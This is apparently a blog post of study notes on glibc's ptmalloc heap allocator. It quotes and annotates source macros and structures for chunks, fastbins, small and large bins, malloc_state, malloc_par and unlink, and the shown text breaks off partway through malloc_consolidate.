ptmalloc src & techniques

不可视境界线 — last updated: March 24, 2023 (evening)

Basic data structures and functions

Managing chunks

Size and alignment checks and conversions

/* conversion from malloc headers to user pointers, and back */
#define chunk2mem(p) ((void*)((char*)(p) + 2*SIZE_SZ))
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
/* The smallest possible chunk */
#define MIN_CHUNK_SIZE (offsetof(struct malloc_chunk, fd_nextsize))
/* The smallest size we can malloc is an aligned minimal chunk */
#define MINSIZE \
(unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
/* Check if m has acceptable alignment */
#define aligned_OK(m) (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
#define misaligned_chunk(p) \
((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
& MALLOC_ALIGN_MASK)
/*
Check if a request is so large that it would wrap around zero when
padded and aligned. To simplify some other code, the bound is made
low enough so that adding MINSIZE will also not wrap around zero.
*/
#define REQUEST_OUT_OF_RANGE(req) \
((unsigned long) (req) >= \
(unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
/* pad request bytes into a usable size -- internal version */
#define request2size(req) \
(((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \
MINSIZE : \
((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
/* Same, except also perform an argument and result check. First, we check
that the padding done by request2size didn't result in an integer
overflow. Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
size isn't so large that a later alignment would lead to another integer
overflow. */
#define checked_request2size(req, sz) \
({ \
(sz) = request2size (req); \
if (((sz) < (req)) \
|| REQUEST_OUT_OF_RANGE (sz)) \
{ \
__set_errno (ENOMEM); \
return 0; \
} \
})

malloc_chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/*
    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of previous chunk, if unallocated (P clear)  |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of chunk, in bytes                     |A|M|P|
      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             User data starts here...                          .
            .                                                               .
            .             (malloc_usable_size() bytes)                      .
            .                                                               |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             (size of chunk, but used for application data)    |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of next chunk, in bytes                |A|0|1|
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */
struct malloc_chunk {
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};

MALLOC_ALIGNMENT is 8 bytes on 32-bit and 16 bytes on 64-bit machines; it is defined as the larger of 2 * SIZE_SZ and __alignof__ (long double).
MALLOC_ALIGN_MASK is defined as MALLOC_ALIGNMENT - 1, i.e. 0b1111 on 64-bit.
MIN_CHUNK_SIZE is the part of malloc_chunk before the fd_nextsize field.
MINSIZE = (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)) rounds that up to 16-byte alignment.

So on a 64-bit system MINSIZE is 32 (0x20) bytes.

tips: #define INTERNAL_SIZE_T size_t — 4 or 8 bytes on 32-/64-bit respectively
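
To make the conversion concrete, here is a minimal standalone sketch (my own illustration, assuming a 64-bit build: SIZE_SZ == 8, MALLOC_ALIGNMENT == 16) that replays request2size on a few request sizes:

#include <stdio.h>

#define SIZE_SZ           8UL
#define MALLOC_ALIGN_MASK 15UL   /* MALLOC_ALIGNMENT - 1 */
#define MINSIZE           32UL

#define request2size(req) \
  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \
   MINSIZE : \
   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)

int main(void)
{
    unsigned long reqs[] = { 0, 0x18, 0x19, 0x88 };
    for (int i = 0; i < 4; i++)   /* prints 0x20, 0x20, 0x30, 0x90 */
        printf("request2size(%#lx) = %#lx\n", reqs[i], request2size(reqs[i]));
    return 0;
}

Note how a 0x18-byte request still fits in a 0x20 chunk: the 8-byte size overhead can borrow the next chunk's prev_size field.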

chunk operations

Nothing special here; look these macros up whenever needed.

/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
#define PREV_INUSE 0x1
/* extract inuse bit of previous chunk */
#define prev_inuse(p) ((p)->mchunk_size & PREV_INUSE)
/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
#define IS_MMAPPED 0x2
/* check for mmap()'ed chunk */
#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
from a non-main arena. This is only set immediately before handing
the chunk to the user, if necessary. */
#define NON_MAIN_ARENA 0x4
/* Check for chunk from main arena. */
#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
/* Mark a chunk as not being on the main arena. */
#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
/*
Bits to mask off when extracting size
Note: IS_MMAPPED is intentionally not masked off from size field in
macros for which mmapped chunks should never be seen. This should
cause helpful core dumps to occur if it is tried by accident by
people extending or adapting this malloc.
*/
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
/* Like chunksize, but do not mask SIZE_BITS. */
#define chunksize_nomask(p) ((p)->mchunk_size)
/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
/* Size of the chunk below P. Only valid if !prev_inuse (P). */
#define prev_size(p) ((p)->mchunk_prev_size)
/* Set the size of the chunk below P. Only valid if !prev_inuse (P). */
#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
/* Ptr to previous physical malloc_chunk. Only valid if !prev_inuse (P). */
#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s)))
/* extract p's inuse bit */
#define inuse(p) \
((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
/* set/clear chunk as being inuse without otherwise disturbing */
#define set_inuse(p) \
((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
#define clear_inuse(p) \
((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
/* check/set/clear inuse bits in known places */
#define inuse_bit_at_offset(p, s) \
(((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
#define set_inuse_bit_at_offset(p, s) \
(((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
#define clear_inuse_bit_at_offset(p, s) \
(((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
/* Set size at head, without disturbing its use bit */
#define set_head_size(p, s) ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
/* Set size/use field */
#define set_head(p, s) ((p)->mchunk_size = (s))
/* Set size at footer (only when chunk is not in use) */
#define set_foot(p, s) (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
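
As a quick illustration of the three low bits, here is a toy example (a hypothetical size-field value, not glibc code):

#include <stdio.h>

#define PREV_INUSE     0x1
#define IS_MMAPPED     0x2
#define NON_MAIN_ARENA 0x4
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

int main(void)
{
    unsigned long field = 0x415;  /* hypothetical mchunk_size value */
    printf("size = %#lx\n", field & ~SIZE_BITS);   /* 0x410 */
    printf("P=%lu M=%lu A=%lu\n",                  /* P=1 M=0 A=1 */
           field & PREV_INUSE,
           (field & IS_MMAPPED) >> 1,
           (field & NON_MAIN_ARENA) >> 2);
    return 0;
}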

Bin

Storage inside malloc_state

struct malloc_state
{
/* Fastbins */
mfastbinptr fastbinsY[NFASTBINS];
/* Normal bins packed as described above */
mchunkptr bins[NBINS * 2 - 2];
};

Bin array addressing and size

#define NBINS             128	// number of bins
/* addressing -- note that bin_at(0) does not exist, *//*Bin 1 is the unordered list*/
#define bin_at(m, i) \
(mbinptr) (((char *) &((m)->bins[((i) - 1) * 2])) \
- offsetof (struct malloc_chunk, fd))
/* analog of ++bin */
#define next_bin(b) ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
/* Reminders about list directionality within bins */
#define first(b) ((b)->fd)
#define last(b) ((b)->bk)
  • The trick in bin_at:

    • Externally the bin array is treated as 128 bins, and the index passed in follows that numbering; internally the index is converted into the address of that bin's fd pointer (take its address with "&", cast it to a byte pointer char *), then the chunk-header size is subtracted, leaving a pointer to a fake chunk header for the bin. Note that only the fd and bk fields of this fake chunk are meaningful; the remaining fields overlap the previous bin's head node.
    • Apart from the external-to-internal index conversion, the remaining steps amount to applying mem2chunk() to the fd field.
  • Why multiply by 2?

    Each bin stores one fd pointer and one bk pointer in the bins array, i.e. two malloc chunk pointers, hence NBINS * 2.
    And since the slots for the nonexistent bin 0 are not stored, 2 is subtracted.

    Example: bins[0] is the unsorted bin's fd and bins[1] its bk; the fake header's prev_size and size fields fall before the array, overlapping the last_remainder and top fields of malloc_state (see the sketch below).
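
The aliasing can be checked directly. A sketch under the 64-bit layout (prev_size at +0x0, size at +0x8, fd at +0x10, bk at +0x18); the local bins array here is a stand-in for av->bins, not the real malloc_state:

#include <stddef.h>
#include <stdio.h>

struct chunk {
    size_t prev_size, size;
    struct chunk *fd, *bk, *fd_nextsize, *bk_nextsize;
};

int main(void)
{
    struct chunk *bins[254] = { 0 };          /* stand-in for av->bins */
    int i = 1;                                /* bin 1: the unsorted bin */
    struct chunk *b = (struct chunk *)((char *)&bins[(i - 1) * 2]
                                       - offsetof(struct chunk, fd));
    /* b->fd aliases bins[0] and b->bk aliases bins[1]; the fake header's
       prev_size/size land *before* the array (inside malloc_state they
       overlap the last_remainder and top fields). */
    printf("%d %d\n", &b->fd == &bins[0], &b->bk == &bins[1]);  /* 1 1 */
    return 0;
}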

unlink: removing a chunk from a bin

  • Happens when free consolidates chunks: the neighbor being merged is unlinked from its bin.
  • In 2.25 unlink is a macro; in 2.26 it is the unlink_chunk function, which merely adds one check:
    • if (chunksize (p) != prev_size (next_chunk (p))) malloc_printerr ("corrupted size vs. prev_size");
/* Take a chunk off a bin list */// the trailing backslash on each line is omitted here
#define unlink(AV, P, BK, FD)
{ // example call: unlink(av, victim, bck, fwd)
FD = P->fd;// grab victim's fd and bk pointers
BK = P->bk;
// routine check: error out unless victim is fully linked into the list
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr (check_action, "corrupted double-linked list", P, AV);
else {// all good:
FD->bk = BK;
BK->fd = FD; // victim is now off the list
if (!in_smallbin_range (chunksize_nomask (P)) && __builtin_expect (P->fd_nextsize != NULL, 0))
{// if it lives in a large bin AND sits on the chunk-size (nextsize) list, fd_nextsize and bk_nextsize must be fixed up as well
// a quick check: is victim *fully* linked into the chunk-size list?
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)
|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))
malloc_printerr (check_action, "corrupted double-linked list (not small)", P, AV);
if (FD->fd_nextsize == NULL) {// FD has the same size as victim
if (P->fd_nextsize == P)// fd_nextsize pointing at itself means this is the only size in the bin
// only FD (and perhaps more equal-sized chunks behind it) remains; fix the chunk-size list
FD->fd_nextsize = FD->bk_nextsize = FD;
else {// there are chunks of other sizes in the bin
FD->fd_nextsize = P->fd_nextsize;
FD->bk_nextsize = P->bk_nextsize;
P->fd_nextsize->bk_nextsize = FD;
P->bk_nextsize->fd_nextsize = FD;
}
} else {// victim is the only chunk of its size
P->fd_nextsize->bk_nextsize = P->bk_nextsize;
P->bk_nextsize->fd_nextsize = P->fd_nextsize;
}
}
}
}
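
Stripped of the nextsize handling, the core is ordinary doubly-linked-list removal plus the integrity check. A toy sketch (my own types, not glibc's):

#include <stdio.h>
#include <stdlib.h>

struct node { struct node *fd, *bk; };

static void unlink_node(struct node *p)
{
    struct node *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)      /* p must be fully linked in */
    {
        fprintf(stderr, "corrupted double-linked list\n");
        abort();
    }
    fd->bk = bk;                         /* splice p out */
    bk->fd = fd;
}

int main(void)
{
    struct node head, a;                 /* circular list: head <-> a */
    head.fd = head.bk = &a;
    a.fd = a.bk = &head;
    unlink_node(&a);
    printf("%d\n", head.fd == &head && head.bk == &head);  /* 1: empty */
    return 0;
}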

fastbin

Overview and properties

/*
Fastbins
An array of lists holding recently freed small chunks. Fastbins
are not doubly linked. It is faster to single-link them, and
since chunks are never removed from the middles of these lists,
double linking is not necessary. Also, unlike regular bins, they
are not even processed in FIFO order (they use faster LIFO) since
ordering doesn't much matter in the transient contexts in which
fastbins are normally used.
Chunks in fastbins keep their inuse bit set, so they cannot
be consolidated with other free chunks. malloc_consolidate
releases all chunks in fastbins and consolidates them with
other free chunks.
*/
- LIFO: chunks are inserted and removed at the list head
- The inuse bit stays set (the next chunk's PREV_INUSE is never cleared), so fastbin chunks are never consolidated with neighboring free chunks
- Chunks are never removed from the middle of the list, so a singly linked list suffices

indexing

typedef struct malloc_chunk *mfastbinptr;
#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
  • fastbin_index also shows that fastbins index by the data-space size a chunk provides: on 32-bit, from the smallest 8 bytes up to 80 bytes of request (64 by default); the actual supported maximum is MAX_FAST_SIZE = 80 * SIZE_SZ / 4 bytes

Count and capacity

In _int_malloc, whether a request falls in fastbin range is decided by get_max_fast(), which returns the global_max_fast variable; malloc_init_state() calls set_max_fast(DEFAULT_MXFAST) to initialize it to 128.

So on 64-bit the fastbin range is 0x20-0x80.
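
A quick worked example of the indexing on 64-bit (SIZE_SZ == 8):

/* fastbin_index(0x20) = (0x20 >> 4) - 2 = 0   (first fastbin)
   fastbin_index(0x30) = (0x30 >> 4) - 2 = 1
   ...
   fastbin_index(0x80) = (0x80 >> 4) - 2 = 6   (last bin used with the
                                                default global_max_fast of 0x80) */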

/* The maximum fastbin request size we support */
// DEFAULT_MXFAST 64 (for 32bit), 128 (for 64bit)
#define MAX_FAST_SIZE (80 * SIZE_SZ / 4)
#define NFASTBINS (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
#define set_max_fast(s) \
global_max_fast = (((s) == 0) \
? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))

/*
FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
that triggers automatic consolidation of possibly-surrounding
fastbin chunks. This is a heuristic, so the exact value should not
matter too much. It is defined at half the default trim threshold as a
compromise heuristic to only attempt consolidation if it is likely
to lead to trimming. However, it is not dynamically tunable, since
consolidation reduces fragmentation surrounding large chunks even
if trimming is not used.
*/
#define FASTBIN_CONSOLIDATION_THRESHOLD (65536UL)

unsorted bin

The unsorted bin sits at index 1 of the bin array (index 0 is unused)

/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
#define unsorted_chunks(M) (bin_at (M, 1))

small bin

#define NSMALLBINS         64
#define SMALLBIN_WIDTH MALLOC_ALIGNMENT // 8 on 32-bit, 16 on 64-bit
#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ) // corrects indexing when the alignment exceeds 2*SIZE_SZ; usually 0
#define MIN_LARGE_SIZE ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH) // 32-bit: 512, 64-bit: 1024
#define in_smallbin_range(sz) \
((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
#define smallbin_index(sz) \
((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+ SMALLBIN_CORRECTION)
  • MIN_LARGE_SIZE is what decides whether a size falls in small bin range

  • Small bins follow right after the unsorted bin: indices 2-63, chunk sizes 0x20-0x3f0 on 64-bit (note these are chunk sizes, not request sizes), so indexing is a plain shift; adjacent indices differ by 0x10 on 64-bit, 0x8 on 32-bit (see the worked example below)

  • The small bin and fast bin ranges partly overlap

  • FIFO: inserted at the list head, taken from the tail
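
A quick worked example of smallbin_index on 64-bit (SMALLBIN_WIDTH == 16, SMALLBIN_CORRECTION == 0):

/* smallbin_index(0x20)  = 0x20  >> 4 = 2    (first small bin)
   smallbin_index(0x100) = 0x100 >> 4 = 16
   smallbin_index(0x3f0) = 0x3f0 >> 4 = 63   (last small bin)
   0x400 == MIN_LARGE_SIZE, so in_smallbin_range(0x400) is already false */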

large bin

#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
#define largebin_index_32(sz) \
(((((unsigned long) (sz)) >> 6) <= 38) ? 56 + (((unsigned long) (sz)) >> 6) :\
((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\
((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
126)
#define largebin_index_32_big(sz) \
(((((unsigned long) (sz)) >> 6) <= 45) ? 49 + (((unsigned long) (sz)) >> 6) :\
((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\
((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
126)
#define largebin_index_64(sz) \
(((((unsigned long) (sz)) >> 6) <= 48) ? 48 + (((unsigned long) (sz)) >> 6) :\
((((unsigned long) (sz)) >> 9) <= 20) ? 91 + (((unsigned long) (sz)) >> 9) :\
((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
126)
#define largebin_index(sz) \
(SIZE_SZ == 8 ? largebin_index_64 (sz) \
: MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz) \
: largebin_index_32 (sz))
  • 0x400-0xc30 : idx 64-96, spacing 0x40
    0xc40-0x29f0: idx 97- , spacing 0x200
    ...

  • From the list head (leftmost) to the tail, following each chunk's fd pointer, chunks are sorted from largest to smallest

    • fd_nextsize points rightward to the first free chunk of the next smaller size, never to the bin header

    • bk_nextsize points leftward to the first free chunk of the next larger size, never to the bin header

    • Large bin structure (a sketch follows):

    [figure: large-bin]
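
To make the two lists concrete, here is my own sketch (not from the source) of a large bin holding three chunks of sizes 0x420, 0x420 and 0x410:

header <-> A(0x420) <-> B(0x420) <-> C(0x410) <-> header   /* fd/bk ring, largest to smallest */

A->fd_nextsize = C;  C->fd_nextsize = A;   /* next smaller size; wraps around */
A->bk_nextsize = C;  C->bk_nextsize = A;   /* next larger size; wraps around */
/* B is the second chunk of its size, so it is NOT on the nextsize list:
   its fd_nextsize/bk_nextsize are not maintained. */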

Top

/*
Top
The top-most available chunk (i.e., the one bordering the end of
available memory) is treated specially. It is never included in
any bin, is used only if no other chunk is available, and is
released back to the system if it is very large (see
M_TRIM_THRESHOLD). Because top initially
points to its own bin with initial zero size, thus forcing
extension on the first malloc request, we avoid having any special
code in malloc to check whether it even exists yet. But we still
need to do so when getting memory from system, so we make
initial_top treat the bin as a legal but unusable chunk during the
interval between initialization and the first call to
sysmalloc. (This is somewhat delicate, since it relies on
the 2 preceding words to be zero during this interval as well.)
*/
/* Conveniently, the unsorted bin can be used as dummy top on first call */
#define initial_top(M) (unsorted_chunks (M))

Overall index dispatch

graph LR
g([bin_index])-->a(smallbin_index) & b(largebin_index)
b-->|64|largebin_index_64
b-->|32 & MALLOC_ALIGNMENT == 16|m[largebin_index_32_big]
b-->|32 & != 16|largebin_index_32

Core structures

malloc_state

struct malloc_state
{
/* Serialize access. */
__libc_lock_define (, mutex);
/* Flags (formerly in max_fast). */
int flags;
/* Set if the fastbin chunks contain recently inserted free blocks. */
/* Note this is a bool but not all targets support atomics on booleans. */
int have_fastchunks; // have_fastchunks is specific to glibc 2.27 and later; 4 bytes, usable as a 32-bit atomic
/* Fastbins */
mfastbinptr fastbinsY[NFASTBINS];
/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;
/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;
/* Normal bins packed as described above */
mchunkptr bins[NBINS * 2 - 2];
/* Bitmap of bins */
unsigned int binmap[BINMAPSIZE];
/* Linked list */
struct malloc_state *next;
/* Linked list for free arenas. Access to this field is serialized
by free_list_lock in arena.c. */
struct malloc_state *next_free;
/* Number of threads attached to this arena. 0 if the arena is on
the free list. Access to this field is serialized by
free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};

flags

/*
FASTCHUNKS_BIT held in max_fast indicates that there are probably
some fastbin chunks. It is set true on entering a chunk into any
fastbin, and cleared only in malloc_consolidate.

The truth value is inverted so that have_fastchunks will be true
upon startup (since statics are zero-filled), simplifying
initialization checks.
*/

#define FASTCHUNKS_BIT (1U)

#define have_fastchunks(M) (((M)->flags & FASTCHUNKS_BIT) == 0)
#define clear_fastchunks(M) catomic_or (&(M)->flags, FASTCHUNKS_BIT)
#define set_fastchunks(M) catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)

Binmap

/*
Binmap
To help compensate for the large number of bins, a one-level index
structure is used for bin-by-bin searching. `binmap' is a
bitvector recording whether bins are definitely empty so they can
be skipped over during traversals. The bits are NOT always
cleared as soon as bins are empty, but instead only
when they are noticed to be empty during traversal in malloc.
*/
/* Conservatively use 32 bits per map word, even if on 64bit system */
#define BINMAPSHIFT 5
#define BITSPERMAP (1U << BINMAPSHIFT)
#define BINMAPSIZE (NBINS / BITSPERMAP)// 32 bits per map word, every bit is used
#define idx2block(i) ((i) >> BINMAPSHIFT)// bits 6 and up select the block
#define idx2bit(i) ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))// i & 31: the low 5 bits select the bit within the block
#define mark_bin(m, i) ((m)->binmap[idx2block (i)] |= idx2bit (i))
#define unmark_bin(m, i) ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
#define get_binmap(m, i) ((m)->binmap[idx2block (i)] & idx2bit (i))
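
A worked example for bin index 65 (a large bin):

/* idx2block(65) = 65 >> 5        = 2
   idx2bit(65)   = 1 << (65 & 31) = 1 << 1 = 0x2
   mark_bin(m, 65)   does  m->binmap[2] |=  0x2
   get_binmap(m, 65) tests m->binmap[2] &   0x2 */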

malloc_par

struct malloc_par // malloc parameters: the heap manager's tunables
{
/* Tunable parameters */
unsigned long trim_threshold;
INTERNAL_SIZE_T top_pad;
INTERNAL_SIZE_T mmap_threshold;
INTERNAL_SIZE_T arena_test;
INTERNAL_SIZE_T arena_max;

/* Memory map support */
int n_mmaps;
int n_mmaps_max;
int max_n_mmaps;
/* the mmap_threshold is dynamic, until the user sets
it manually, at which point we need to disable any
dynamic behavior. */
int no_dyn_threshold;

/* Statistics */
INTERNAL_SIZE_T mmapped_mem;
INTERNAL_SIZE_T max_mmapped_mem;

/* First address handed out by MORECORE/sbrk. */
char *sbrk_base;

#if USE_TCACHE
/* Maximum number of buckets to use. */
size_t tcache_bins;
size_t tcache_max_bytes;
/* Maximum number of chunks in each bucket. */
size_t tcache_count;
/* Maximum number of chunks to remove from the unsorted list, which
aren't used to prefill the cache. */
size_t tcache_unsorted_limit;
#endif
};
  • When an arena's top chunk grows beyond trim_threshold, free will (under certain conditions) shrink memory, reducing the top chunk's size.
  • top_pad is extra padding added when requesting memory from the system; 0 by default.
  • mmap_threshold is the mmap allocation threshold, 128KB by default, capped at 512KB on 32-bit and 32MB on 64-bit. Since dynamic mmap-threshold adjustment is enabled by default, the field's value changes at runtime, but never exceeds the cap.
  • arena_test and arena_max serve the PER_THREAD optimization. arena_test defaults to 2 on 32-bit and 8 on 64-bit: while the process has no more than arena_test arenas, existing arenas are not reused. To bound the total, arena_max holds the maximum arena count: once the process reaches arena_max arenas, no new ones are created and existing ones are reused. Both fields can be set with mallopt().
  • n_mmaps is the number of memory blocks the process currently has allocated via mmap().
  • n_mmaps_max is the maximum number of mmap()-allocated blocks allowed, 65536 by default, settable with mallopt().
  • max_n_mmaps is the high-water mark of n_mmaps (so n_mmaps <= max_n_mmaps always holds); it exists for the statistics printed by mstats().
  • no_dyn_threshold says whether dynamic mmap-threshold adjustment is disabled; 0 by default, i.e. adjustment is enabled.
  • pagesize (present in older glibc versions) is the system page size, 4KB by default.
  • mmapped_mem and max_mmapped_mem both track the amount of memory allocated by mmap; they are usually equal, and max_mmapped_mem is used by mstats().
  • max_total_mem (present in older glibc versions) tracks the total memory allocated by the process in the single-threaded case.
  • sbrk_base is the start address of the heap.

main_arena

static struct malloc_state main_arena = // main_arena is a global static variable inside libc
{
.mutex = _LIBC_LOCK_INITIALIZER,
.next = &main_arena,
.attached_threads = 1
};

mp_

/* There is only one instance of the malloc parameters.  */

static struct malloc_par mp_ =
{
.top_pad = DEFAULT_TOP_PAD,
.n_mmaps_max = DEFAULT_MMAP_MAX,
.mmap_threshold = DEFAULT_MMAP_THRESHOLD,
.trim_threshold = DEFAULT_TRIM_THRESHOLD,
#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
.arena_test = NARENAS_FROM_NCORES (1)
#if USE_TCACHE
,
.tcache_count = TCACHE_FILL_COUNT,
.tcache_bins = TCACHE_MAX_BINS,
.tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
.tcache_unsorted_limit = 0 /* No limit. */
#endif
};
  • sets top_pad to 0
  • sets n_mmaps_max to 65536
  • sets mmap_threshold to 128 * 1024
  • sets trim_threshold to 128 * 1024
  • sets arena_test to 2 on 32-bit and 8 on 64-bit under gcc (the width of long may differ between compilers; gcc is assumed here)

malloc_consolidate

/*
------------------------- malloc_consolidate -------------------------

malloc_consolidate is a specialized version of free() that tears
down chunks held in fastbins. Free itself cannot be used for this
purpose since, among other things, it might place chunks back onto
fastbins. So, instead, we need to use a minor variant of the same
code.

Also, because this routine needs to be called the first time through
malloc anyway, it turns out to be the perfect place to trigger
initialization code.
*/

static void malloc_consolidate(mstate av)
{
mfastbinptr* fb; /* current fastbin being consolidated */
mfastbinptr* maxfb; /* last fastbin (for loop control) */
mchunkptr p; /* current chunk being consolidated */
mchunkptr nextp; /* next chunk to consolidate */
mchunkptr unsorted_bin; /* bin header */
mchunkptr first_unsorted; /* chunk to link to */

/* These have same use as in free() */
mchunkptr nextchunk;
INTERNAL_SIZE_T size;
INTERNAL_SIZE_T nextsize;
INTERNAL_SIZE_T prevsize;
int nextinuse;
mchunkptr bck;
mchunkptr fwd;

/*
If max_fast is 0, we know that av hasn't
yet been initialized, in which case do so below
*/
// max_fast != 0 means the fastbins have been initialized
if (get_max_fast() != 0) {
// clear the fastbin flag,
// since the fastbin chunks are about to be consolidated.
clear_fastchunks(av);
//
unsorted_bin = unsorted_chunks(av);

/*
Remove each chunk from fast bin and consolidate it, placing it
then in unsorted bin. Among other reasons for doing this,
placing in unsorted bin avoids needing to calculate actual bins
until malloc is sure that chunks aren't immediately going to be
reused anyway.
*/
// walk every fastbin in fd order, consolidating each chunk in the bin.
maxfb = &fastbin(av, NFASTBINS - 1);
fb = &fastbin(av, 0);
do {
p = atomic_exchange_acq(fb, NULL);
if (p != 0) {
do {
check_inuse_chunk(av, p);
nextp = p->fd;

/* Slightly streamlined version of consolidation code in
* free() */
size = chunksize(p);
nextchunk = chunk_at_offset(p, size);
nextsize = chunksize(nextchunk);

if (!prev_inuse(p)) { // p's previous chunk is free: unlink it right away and compute the merged size
prevsize = prev_size(p);
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(av, p, bck, fwd);
}

if (nextchunk != av->top) {
// check whether nextchunk is free.
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

if (!nextinuse) { // p's next chunk is free: unlink it right away and compute the merged size
size += nextsize;
unlink(av, nextchunk, bck, fwd);
} else
// clear nextchunk's prev_inuse to record that the current fast chunk is free.
